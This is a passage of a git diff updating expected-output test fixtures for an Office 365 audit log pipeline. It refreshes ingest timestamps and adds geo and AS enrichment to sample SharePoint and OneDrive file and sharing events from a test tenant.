@@ -355,7 +403,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865163100Z", + "ingested": "2021-12-14T14:49:43.390659508Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -394,6 +442,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -454,7 +514,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865167600Z", + "ingested": "2021-12-14T14:49:43.390659931Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -493,6 +553,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -552,7 +624,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865172500Z", + "ingested": "2021-12-14T14:49:43.390660347Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -591,6 +663,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -650,7 +734,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865177200Z", + "ingested": "2021-12-14T14:49:43.390660758Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -689,6 +773,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -749,7 +845,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865180800Z", + "ingested": "2021-12-14T14:49:43.390661164Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -788,6 +884,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -847,7 +955,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865185100Z", + "ingested": "2021-12-14T14:49:43.390661577Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -886,6 +994,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -945,7 +1065,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865190700Z", + "ingested": "2021-12-14T14:49:43.390661991Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -984,6 +1104,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { 
@@ -1043,7 +1175,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865195600Z", + "ingested": "2021-12-14T14:49:43.390662420Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json index c2765e337eb..b6c75d368d2 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json 
@@ -43,7 +43,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545726200Z", + "ingested": "2021-12-14T14:49:46.421913935Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"4d1a6a2b-360c-423d-96e5-08d7b3cacd83\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"Everyone except external users\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -115,7 +115,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545736200Z", + "ingested": "2021-12-14T14:49:46.421940224Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"56696ec0-5a7e-4561-5e88-08d7b3cacd4a\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -187,7 +187,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545741900Z", + "ingested": "2021-12-14T14:49:46.421941955Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"b8c880ff-e8fe-407c-9ce9-08d7b3cacd07\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Owners\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -259,7 +259,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545747700Z", + "ingested": "2021-12-14T14:49:46.421942479Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"483f657f-9141-45fc-b141-08d7b3caccfb\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Members\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -331,7 +331,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545752500Z", + "ingested": "2021-12-14T14:49:46.421942932Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:49\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"13004a30-d15a-48a5-16ec-08d7b3caccc0\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -362,6 +362,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -415,7 +427,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545757200Z", + "ingested": "2021-12-14T14:49:46.421943514Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -452,6 +464,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -509,7 +533,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545762400Z", + "ingested": "2021-12-14T14:49:46.421943981Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -546,6 +570,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -604,7 +640,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545766900Z", + "ingested": "2021-12-14T14:49:46.421944431Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -641,6 +677,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
